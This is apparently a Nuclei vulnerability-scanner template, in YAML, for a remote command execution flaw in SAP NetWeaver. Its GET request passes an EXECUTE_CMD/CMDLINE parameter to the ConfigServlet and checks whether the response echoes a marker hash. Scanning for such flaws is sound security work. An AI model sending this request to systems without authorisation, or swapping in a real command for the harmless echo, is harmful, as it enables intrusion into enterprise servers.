id: SAP-NetWeaver-rce

info:
  name: Sap Netweaver命令执行
  author: Str1am
  severity: high
  tags: NetWeaver,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=echo%2021232f297a57a5a743894a0e4a801fc3"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "21232f297a57a5a743894a0e4a801fc3"
        part: body
        condition: and
